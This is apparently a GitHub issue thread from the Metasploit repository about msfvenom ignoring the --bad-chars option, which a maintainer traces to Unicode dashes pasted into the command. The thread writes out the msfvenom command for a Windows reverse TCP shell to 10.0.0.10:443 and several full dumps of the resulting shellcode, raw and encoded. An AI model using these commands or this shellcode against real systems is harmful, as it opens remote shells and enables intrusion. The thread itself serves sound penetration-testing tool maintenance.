### ISSUE TITLE
msfvenom -b or --bad-chars option not working

### ISSUE THREAD

**Issue by LaurentLF** [rapid7/metasploit-framework#5677]
Hello,

On Kali Linux (up to date), I have issue with msfvenom not removing unwanted chars, even with latest metasploit packages (metasploit v4.11.3-2015063001).

Looks like msfvenom doesn't take the --bad-chars option :

laurent@Kali:~$ msfvenom --payload windows/shell_reverse_tcp lhost=10.0.0.10 lport=443 ‐-bad-chars '\x00\x0a\x0d' -f python
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
<b>No encoder or badchars specified</b>, outputting raw payload
Payload size: 324 bytes
buf =  ""
buf += "\xfc\xe8\x82<b>\x00\x00\x00</b>\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "<b>\x0d</b>\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf<b>\x0d</b>\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32<b>\x00\x00</b>\x68"
buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += "\x90\x01<b>\x00\x00</b>\x29\xc4\x54\x50\x68\x29\x80\x6b<b>\x00</b>"
buf += "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
buf += "\xdf\xe0\xff\xd5\x97\x6a\x05\x68<b>\x0a\x00\x00\x0a</b>\x68"
buf += "\x02<b>\x00</b>\x01\xbb\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"
buf += "\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64<b>\x00</b>\x89"
buf += "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66"
buf += "\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6<b>\x00</b>\x44"
buf += "\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"
buf += "\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"
buf += "\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68"
buf += "\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c<b>\x0a</b>\x80\xfb\xe0"
buf += "\x75\x05\xbb\x47\x13\x72\x6f\x6a<b>\x00</b>\x53\xff\xd5"

I know there was same kind of issue fixed in #3769, so wondering why I get this.

**Comment by FireFart** [comment]
@LaurentLF looks like your comment has some UTF-8 dashes which breaks the parsing logic. The `--` before `--bad-chars` are not normal dashes and so this parameter gets interpreted as a datastore option like LHOST. If you modify your command and manually replace the `--` (I assume you copied it from the internet) the command works as expected

**Comment by FireFart** [comment]
Here is the output. I added some debug output so you can see how the command was parsed

Your command (notice the datastore values):
```
macbook:metasploit-framework firefart$ ./msfvenom --payload windows/shell_reverse_tcp lhost=10.0.0.10 lport=443 ‐-bad-chars '\x00\x0a\x0d' -f python
{:payload=>"windows/shell_reverse_tcp", :format=>"python", :datastore=>{"LHOST"=>"10.0.0.10", "LPORT"=>"443", "\u2010-BAD-CHARS"=>"", "\\X00\\X0A\\X0D"=>""}}
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
buf =  ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
buf += "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
buf += "\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x00\x00\x0a\x68"
buf += "\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"
buf += "\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89"
buf += "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66"
buf += "\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44"
buf += "\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"
buf += "\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"
buf += "\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68"
buf += "\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
buf += "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
```
With replaced dashes:
```
macbook:metasploit-framework firefart$ ./msfvenom --payload windows/shell_reverse_tcp lhost=10.0.0.10 lport=443 --bad-chars '\x00\x0a\x0d' -f python
{:payload=>"windows/shell_reverse_tcp", :badchars=>"\x00\n\r", :format=>"python", :datastore=>{"LHOST"=>"10.0.0.10", "LPORT"=>"443"}}
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
buf =  ""
buf += "\xd9\xd0\xb8\x58\xae\x0e\xf7\xd9\x74\x24\xf4\x5e\x29"
buf += "\xc9\xb1\x52\x31\x46\x17\x03\x46\x17\x83\xb6\x52\xec"
buf += "\x02\xba\x43\x73\xec\x42\x94\x14\x64\xa7\xa5\x14\x12"
buf += "\xac\x96\xa4\x50\xe0\x1a\x4e\x34\x10\xa8\x22\x91\x17"
buf += "\x19\x88\xc7\x16\x9a\xa1\x34\x39\x18\xb8\x68\x99\x21"
buf += "\x73\x7d\xd8\x66\x6e\x8c\x88\x3f\xe4\x23\x3c\x4b\xb0"
buf += "\xff\xb7\x07\x54\x78\x24\xdf\x57\xa9\xfb\x6b\x0e\x69"
buf += "\xfa\xb8\x3a\x20\xe4\xdd\x07\xfa\x9f\x16\xf3\xfd\x49"
buf += "\x67\xfc\x52\xb4\x47\x0f\xaa\xf1\x60\xf0\xd9\x0b\x93"
buf += "\x8d\xd9\xc8\xe9\x49\x6f\xca\x4a\x19\xd7\x36\x6a\xce"
buf += "\x8e\xbd\x60\xbb\xc5\x99\x64\x3a\x09\x92\x91\xb7\xac"
buf += "\x74\x10\x83\x8a\x50\x78\x57\xb2\xc1\x24\x36\xcb\x11"
buf += "\x87\xe7\x69\x5a\x2a\xf3\x03\x01\x23\x30\x2e\xb9\xb3"
buf += "\x5e\x39\xca\x81\xc1\x91\x44\xaa\x8a\x3f\x93\xcd\xa0"
buf += "\xf8\x0b\x30\x4b\xf9\x02\xf7\x1f\xa9\x3c\xde\x1f\x22"
buf += "\xbc\xdf\xf5\xe5\xec\x4f\xa6\x45\x5c\x30\x16\x2e\xb6"
buf += "\xbf\x49\x4e\xb9\x15\xe2\xe5\x40\xfe\x07\xfa\x4a\xf4"
buf += "\x7f\xf8\x4a\x09\x3b\x75\xac\x63\x2b\xd0\x67\x1c\xd2"
buf += "\x79\xf3\xbd\x1b\x54\x7e\xfd\x90\x5b\x7f\xb0\x50\x11"
buf += "\x93\x25\x91\x6c\xc9\xe0\xae\x5a\x65\x6e\x3c\x01\x75"
buf += "\xf9\x5d\x9e\x22\xae\x90\xd7\xa6\x42\x8a\x41\xd4\x9e"
buf += "\x4a\xa9\x5c\x45\xaf\x34\x5d\x08\x8b\x12\x4d\xd4\x14"
buf += "\x1f\x39\x88\x42\xc9\x97\x6e\x3d\xbb\x41\x39\x92\x15"
buf += "\x05\xbc\xd8\xa5\x53\xc1\x34\x50\xbb\x70\xe1\x25\xc4"
buf += "\xbd\x65\xa2\xbd\xa3\x15\x4d\x14\x60\x25\x04\x34\xc1"
buf += "\xae\xc1\xad\x53\xb3\xf1\x18\x97\xca\x71\xa8\x68\x29"
buf += "\x69\xd9\x6d\x75\x2d\x32\x1c\xe6\xd8\x34\xb3\x07\xc9"
```

**Comment by LaurentLF** [comment]
Oh... I wouldn't have thought of that kind of character encoding issue in the command itself.
Thanks a lot.
